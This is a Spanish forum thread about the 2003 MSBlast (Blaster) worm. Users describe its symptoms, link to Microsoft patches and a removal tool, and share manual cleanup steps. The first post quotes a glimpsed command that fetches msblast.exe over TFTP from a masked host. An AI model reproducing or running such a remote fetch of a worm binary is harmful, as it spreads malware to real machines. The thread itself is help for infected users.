-
Bueno parece que la suerte no va conmigo…..
Estoy trankilamente navegando cuando de pronto un mensaje, la conexion remota ... (RPC) ha fallado, el sistema de apagado ha sido inicador por una tal NT authority\system
:susto: . Vale, voy a revisar el servicio de control remoto, asi como desactivar el escritorio remoto y tal. Cual es mi sorpresa cuando reviso este servicio, y en iniciar sesion estaba el tal nt authority\system con su contraseña correspondiente, lo borro y pongo inicio local y tal. Me da por revisar TODOS los servicios manuales y automaticos y en la mayoria ya estaba este "intruso", tales como servicio DNS, DHCP, cliente WEB, Registro remoto.... la mayoria de redes, pues nada los pongo todos como locales y parece que acepta, esto claro despues de reiniciar y apagar el cable modem.Luego reviso el registro, a ver que arranca y veo que inicia el tal msblast.exe, que como el proceso lo he parado varias veces parece que utiliza el servicio de actualizaciones automaticas (el ke tengo desactivado) para reconnectarse cuando lo kitas, se archiva en system32. Cuando este proceso esta en memoria no te deja iniciar servicios de red y lo que hace es (al menos lo que he experimentado) hacer fallar el acceso remoto (RPC) y configurar el mismo para que ante un fallo se reinicie la computadora, algo muy molesto si lo hace en menos de 1 minuto cada vez que reinicias. He deshabilitado un monton de servicios de red, como todos los accesos remotos y el registro remoto, he borrado la clave del registro, el archivo en msblast.exe , pero si no abro el simbolo del sistema justo al iniciar, se reconecta "alguien" pidiendo el msblast.exe a través del simbolo del sistema, algo así como: cmd.exe tlftp xxx.xxx.xxx.xxx get msblast.exe (se ve un par de segundos) y volvemos a la jugada.
Curioso no? algun "gracioso" jugueteando con la red? troyano? virus? (el antivirus al menos nolo detecta)
Bueno pues si a alguien le pasa aki dejo mi experiencia.
Salu2!
Editado: Existe otra rama en el foro windows http://www.hardlimit.com/forum/showthread.php?s=&threadid=20988
-
jeje, pueS ya eres la 12ª peRsona que conozCo a la que le Pasa(a mi no me a pasaDo:D ), resulta que esto no es mas que un aguJero d seGuridad en nueStro queriDo Windows xP :risitas:
Puedes solucionarLo bajandoTe esTE parcHe: ParCHe Y un Aplauso para M$ :D:D:D -
Juas, acabo de hablar con mas gente, y todos les pasa lo mismo.
Dekode tienes razon, un wen agujerito del XP, vaya tarde ma dao el pc hoy :rabieta:
En fin, Un saludo y Thanks.
-
Nà Hombre, es mas, yo Me he divertido eXplicandoselo a 11 personas a la veZ x el messenger
-
Ayer volví a conectarme al IRC después de mucho tiempo y en un par de horas atendí a 3 ó 4 personas sobre el tema. Gracias a estar presente en una conversación sobre esto pude reconocer que cojones era (no soy usuario de Windows en casa) y ayudarles.
Para no tener que repetir lo mismo cien veces he escrito esta mañana un pequeño texto sobre el tema ( http://confrontacion.blogalia.com/historias/10542 ) que os pego aquí mismo:
Debido a la magnitud del problema con el gusano msblast voy a explicaros un poco en que consiste, porqué estais infectados y que debeis hacer (tanto si estais infectados como si no).
El msblast (w32.blaster.worm) es un gusano (un virus que se propaga él solito por internet) que aprovecha una vulnerabilidad de varios sistemas Windows (NT4, 2000, XP, Server 2003) para infectar sistemas y autopropagarse. Una vez estás infectado intenta un ataque DoS sobre windowsupdate.com para que no puedas actualizar tu sistema con el parche correspondiente a la vulnerabilidad aprovechada.
Esta vulnerabilidad fue reconocida por Microsoft el 16 de Julio y hay varios parches. Los que os pueden interesar seguramente sean estos dos:
· Parche para XP.
· Parche para Windows 2000 (requiere ServicePack 3 ó 4).Si no estabais infectados (un síntoma de la infección es el reinicio cada 5 minutos de la máquina) esto evitará que os infecteis, aunque se rumorea que el parche para Windows 2000 no arregla del todo la vulnerabilidad.
Si estabais infectados esto evitará que os volvais a infectar una vez hayais limpiado vuestra máquina. Para limpiarla podeis usar este programa de Symantec. Aunque si os gusta hacerlo a mano básicamente se trata de buscar las entradas del registro que hagan referencia a msblast y borrarlas. Después reiniciamos y borramos el ejecutable. Si hemos aplicado el parche de Microsoft ya podemos estar seguros de que msblast no nos hará daño de nuevo.
¡Ojo! Los antivirus que no estén actualizados a 11 de Agosto no lo detectarán.
¡Ojo! Es imperativa la aplicación del parche esteis o no infectados. Se prevee la aparición de otros gusanos que podrían ser más destructivos que msblast que, de hecho, no tiene ningún payload destructivo conocido.
P.D.: Podría aprovechar para hacer apología de otros sistemas operativos
pero en este caso gran parte de la culpa es del usuario que no actualiza el sistema. A partir de ahora espero que cojan la costumbre de actualizar sus sistemas (windowsupdate.com si son ustedes usuarios de Windows).Teneis permiso para copiarlo, ya sea entero o a trozos sin tener que pedir permiso ni citar fuentes. Aunque si me citais como fuente estaré más contento :risitas:
Tampoco os perdais los comentarios que vayan saliendo pues suelen ser interesantes -
En barrapunto tb se hacen eco:
http://barrapunto.com/articles/03/08/12/1046223.shtml -
En el pc q tenemos en el restaurante para cobrar las mesas tb ha pillado el dichoso gusano y mira q se conecta poca a la red…
-
Aqui he visto este interesante articulo y guia para saber sobre este tema de este peligroso virus gusano
http://www.adslayuda.com/displayarticle939.html
para más noticias, información y otros links interesantes sobre este tema
mirad en esta otra rama
http://www.hardlimit.com/forum/showthread.php?s=&postid=170236#post170236
-
toko madera ke a mi no me a tokado todavia :risitas:
Saludos
-
Pues a mi no me ha entrado, pero me han pringao y mañana se lo meteré a mi amiga (el parche malpensaos:D), como tiene una conexión de 56Kb no da tiempo a que se baje el parche:muerto:
